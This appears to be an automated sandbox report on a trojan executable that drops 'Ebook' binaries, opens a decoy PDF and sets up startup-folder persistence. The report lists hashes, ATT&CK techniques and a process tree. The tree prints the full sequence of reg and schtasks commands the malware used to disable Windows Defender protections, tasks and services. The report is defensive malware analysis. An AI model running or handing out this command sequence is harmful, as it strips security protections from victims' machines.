13540d62324d40e8b15db72f32fdf1eb407f4f4d9c4cac05d5f436c39a000df2

General

Target

b4f13d994a6ecd0853ffae7794afdb36.exe
Size

15.0MB
MD5

d8b28c55bf7cc4a07a1766b33109e82b
SHA1

03ba66c56ca18bcecd078aeb9558825062157403
SHA256

13540d62324d40e8b15db72f32fdf1eb407f4f4d9c4cac05d5f436c39a000df2
SHA512

2654e24a3d2a23b8f004d32cc809fc4826fba7d59eb13889f2cc0e1f5df967fa91bf38873f1d555da62e427dde47adfd8231e91d62a0a55195858fc01fab22b6

Score

10^/10

evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Executes dropped EXE 3 IoCs

Processes:

EbookReaderMui.exeEbookRplg.exeEbookNplg.exe

pid process

2812 EbookReaderMui.exe
3740 EbookRplg.exe
4000 EbookNplg.exe

pid	process
2812	EbookReaderMui.exe
3740	EbookRplg.exe
4000	EbookNplg.exe

Drops startup file 4 IoCs

Processes:

EbookNplg.exeEbookRplg.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InstallMui.exe	EbookNplg.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InstallMui.exe	EbookNplg.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\installui.exe	EbookRplg.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\installui.exe	EbookRplg.exe

Modifies service 2 TTPs 5 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv	reg.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

Processes:

b4f13d994a6ecd0853ffae7794afdb36.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	b4f13d994a6ecd0853ffae7794afdb36.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

Processes:

EbookNplg.exeEbookRplg.exeAcroRd32.exe

pid	process
4000	EbookNplg.exe
3740	EbookRplg.exe
4000	EbookNplg.exe
3740	EbookRplg.exe
4000	EbookNplg.exe
4000	EbookNplg.exe
4000	EbookNplg.exe
4000	EbookNplg.exe
4000	EbookNplg.exe
4000	EbookNplg.exe
4000	EbookNplg.exe
4000	EbookNplg.exe
3740	EbookRplg.exe
3740	EbookRplg.exe
3740	EbookRplg.exe
3740	EbookRplg.exe
3740	EbookRplg.exe
3740	EbookRplg.exe
3740	EbookRplg.exe
3740	EbookRplg.exe
200	AcroRd32.exe
200	AcroRd32.exe
200	AcroRd32.exe
200	AcroRd32.exe
200	AcroRd32.exe
200	AcroRd32.exe
200	AcroRd32.exe
200	AcroRd32.exe
200	AcroRd32.exe
200	AcroRd32.exe
200	AcroRd32.exe
200	AcroRd32.exe
200	AcroRd32.exe
200	AcroRd32.exe
200	AcroRd32.exe
200	AcroRd32.exe
200	AcroRd32.exe
200	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

EbookNplg.exeEbookRplg.exe

description pid process

Token: SeDebugPrivilege 4000 EbookNplg.exe
Token: SeDebugPrivilege 3740 EbookRplg.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AcroRd32.exe

pid process

200 AcroRd32.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

EbookReaderMui.exeAcroRd32.exe

pid process

2812 EbookReaderMui.exe
200 AcroRd32.exe
200 AcroRd32.exe
200 AcroRd32.exe
200 AcroRd32.exe
200 AcroRd32.exe

description	pid	process
Token: SeDebugPrivilege	4000	EbookNplg.exe
Token: SeDebugPrivilege	3740	EbookRplg.exe

pid	process
200	AcroRd32.exe

pid	process
2812	EbookReaderMui.exe
200	AcroRd32.exe
200	AcroRd32.exe
200	AcroRd32.exe
200	AcroRd32.exe
200	AcroRd32.exe

Suspicious use of WriteProcessMemory 327 IoCs

Processes:

b4f13d994a6ecd0853ffae7794afdb36.exeEbookReaderMui.execmd.exe

description	pid	process	target process
PID 4040 wrote to memory of 2812	4040	b4f13d994a6ecd0853ffae7794afdb36.exe	EbookReaderMui.exe
PID 4040 wrote to memory of 2812	4040	b4f13d994a6ecd0853ffae7794afdb36.exe	EbookReaderMui.exe
PID 4040 wrote to memory of 2812	4040	b4f13d994a6ecd0853ffae7794afdb36.exe	EbookReaderMui.exe
PID 4040 wrote to memory of 3740	4040	b4f13d994a6ecd0853ffae7794afdb36.exe	EbookRplg.exe
PID 4040 wrote to memory of 3740	4040	b4f13d994a6ecd0853ffae7794afdb36.exe	EbookRplg.exe
PID 4040 wrote to memory of 3740	4040	b4f13d994a6ecd0853ffae7794afdb36.exe	EbookRplg.exe
PID 4040 wrote to memory of 4000	4040	b4f13d994a6ecd0853ffae7794afdb36.exe	EbookNplg.exe
PID 4040 wrote to memory of 4000	4040	b4f13d994a6ecd0853ffae7794afdb36.exe	EbookNplg.exe
PID 4040 wrote to memory of 4000	4040	b4f13d994a6ecd0853ffae7794afdb36.exe	EbookNplg.exe
PID 4040 wrote to memory of 200	4040	b4f13d994a6ecd0853ffae7794afdb36.exe	AcroRd32.exe
PID 4040 wrote to memory of 200	4040	b4f13d994a6ecd0853ffae7794afdb36.exe	AcroRd32.exe
PID 4040 wrote to memory of 200	4040	b4f13d994a6ecd0853ffae7794afdb36.exe	AcroRd32.exe
PID 2812 wrote to memory of 2004	2812	EbookReaderMui.exe	cmd.exe
PID 2812 wrote to memory of 2004	2812	EbookReaderMui.exe	cmd.exe
PID 2004 wrote to memory of 1512	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 1512	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 3624	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 3624	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 1180	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 1180	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 3936	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 3936	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 2512	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 2512	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 2924	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 2924	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 3996	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 3996	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 4056	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 4056	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 1352	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 1352	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 2808	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 2808	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 732	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 732	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 1340	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 1340	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 2652	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 2652	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 3912	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 3912	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 2456	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 2456	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 2924	2004	cmd.exe	schtasks.exe
PID 2004 wrote to memory of 2924	2004	cmd.exe	schtasks.exe
PID 2004 wrote to memory of 4056	2004	cmd.exe	schtasks.exe
PID 2004 wrote to memory of 4056	2004	cmd.exe	schtasks.exe
PID 2004 wrote to memory of 3376	2004	cmd.exe	schtasks.exe
PID 2004 wrote to memory of 3376	2004	cmd.exe	schtasks.exe
PID 2004 wrote to memory of 1380	2004	cmd.exe	schtasks.exe
PID 2004 wrote to memory of 1380	2004	cmd.exe	schtasks.exe
PID 2004 wrote to memory of 3892	2004	cmd.exe	schtasks.exe
PID 2004 wrote to memory of 3892	2004	cmd.exe	schtasks.exe
PID 2004 wrote to memory of 2508	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 2508	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 4056	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 4056	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 1368	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 1368	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 3976	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 3976	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 1512	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 1512	2004	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\b4f13d994a6ecd0853ffae7794afdb36.exe
"C:\Users\Admin\AppData\Local\Temp\b4f13d994a6ecd0853ffae7794afdb36.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4040

C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe
"C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2812

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3C63.tmp\3C64.tmp\3C65.bat C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:2004

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
4⤵
PID:1512

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:3624

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
PID:1180

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
4⤵
PID:3936

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
PID:2512

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
PID:2924

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
PID:3996

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
PID:4056

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
PID:1352

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
4⤵
PID:2808

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
4⤵
PID:732

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
4⤵
PID:1340

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
4⤵
PID:2652

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:3912

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:2456

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
4⤵
PID:2924

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
4⤵
PID:4056

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
4⤵
PID:3376

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
4⤵
PID:1380

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
4⤵
PID:3892

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
4⤵
PID:2508

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4⤵
PID:4056

C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:1368

C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:3976

C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:1512

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
4⤵
- Modifies service
PID:3976

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
4⤵
- Modifies service
PID:4128

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
4⤵
- Modifies service
PID:4164

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
4⤵
- Modifies service
PID:4180

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
4⤵
- Modifies service
PID:4208

C:\Users\Admin\AppData\Roaming\EbookRplg.exe
"C:\Users\Admin\AppData\Roaming\EbookRplg.exe"
2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3740

C:\Users\Admin\AppData\Roaming\EbookNplg.exe
"C:\Users\Admin\AppData\Roaming\EbookNplg.exe"
2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4000

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Games-Aktuell-05-2020.pdf"
2⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:200

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
3⤵
PID:4004

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=79BA6ADFFBB39D4D6873DC1F516B233E --mojo-platform-channel-handle=1636 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
4⤵
PID:4420

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=60DDD6F7A6010F68307DC73066E0102A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=60DDD6F7A6010F68307DC73066E0102A --renderer-client-id=2 --mojo-platform-channel-handle=1648 --allow-no-sandbox-job /prefetch:1
4⤵
PID:4436

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=0D646FE9FCA8661FD3ABD688504FC120 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=0D646FE9FCA8661FD3ABD688504FC120 --renderer-client-id=4 --mojo-platform-channel-handle=2068 --allow-no-sandbox-job /prefetch:1
4⤵
PID:4572

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2ECA88EDC3E943D70E59A160836B8248 --mojo-platform-channel-handle=2448 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
4⤵
PID:4720

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=76E143AC8485DC7DF4AC8F7AC5150725 --mojo-platform-channel-handle=2608 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
4⤵
PID:4128

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F06ADB2F2B00EEF405D67FF5B9B83E13 --mojo-platform-channel-handle=1924 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
4⤵
PID:1960

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Privilege Escalation

Defense Evasion

Modify Registry

3

T1112

Disabling Security Tools

1

T1089

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\3C63.tmp\3C64.tmp\3C65.bat
MD5
665f21a9b6730aa08e62473e481b8c55

SHA1
717d52e75ac16bf032299828dd61c86af281eb43

SHA256
dcaba420b47b5527bd3761ae8a2b76bbbf387100613b7c2f256cfe9ec58fb579

SHA512
b3c6fe2555613f4f7b30ba434e94421c397008a999ff5c07b5df349c550ef6b4d2a8b831208ad3bb25998bf9d2fe0dbb86414ef23ef9216211ab96373d9b6f1e

Download Submit
C:\Users\Admin\AppData\Roaming\EbookNplg.exe
MD5
34a185bb131df034d21df734a479818d

SHA1
46e8c775b5224e78769753c70731e7e2ad6022f2

SHA256
bbcbeba25ea1bcfd23d53bc391babb4a6dc6f4e2d57f2b8d468fe321560e6e11

SHA512
eccbda45841b2ddcea86192150cc0fc01129c81e838b4e6a4c379a29fded8fb0b04292b0fe58d398dec3ed5476dfb40111e05c9a9e7153f3348d3e57c01bdc41

Download Submit
C:\Users\Admin\AppData\Roaming\EbookNplg.exe
MD5
34a185bb131df034d21df734a479818d

SHA1
46e8c775b5224e78769753c70731e7e2ad6022f2

SHA256
bbcbeba25ea1bcfd23d53bc391babb4a6dc6f4e2d57f2b8d468fe321560e6e11

SHA512
eccbda45841b2ddcea86192150cc0fc01129c81e838b4e6a4c379a29fded8fb0b04292b0fe58d398dec3ed5476dfb40111e05c9a9e7153f3348d3e57c01bdc41

Download Submit
C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe
MD5
9684ab1ebcc8844fbbffd54b3b8e5db1

SHA1
1fbbca3f9e063ce98cde453e1b820e056a524771

SHA256
c32c8c21376f44cbe18075fd2f145944efe7809f4121f24661c6cd6f713909ec

SHA512
b4e9db48dca6cf5e150236523f8f77f5180797715502107c2dfa93da30f81cef3b8a014be1374a30c349ed9e10a831c297fcf8269fc71070c2a1b9bc7df2b1df

Download Submit
C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe
MD5
9684ab1ebcc8844fbbffd54b3b8e5db1

SHA1
1fbbca3f9e063ce98cde453e1b820e056a524771

SHA256
c32c8c21376f44cbe18075fd2f145944efe7809f4121f24661c6cd6f713909ec

SHA512
b4e9db48dca6cf5e150236523f8f77f5180797715502107c2dfa93da30f81cef3b8a014be1374a30c349ed9e10a831c297fcf8269fc71070c2a1b9bc7df2b1df

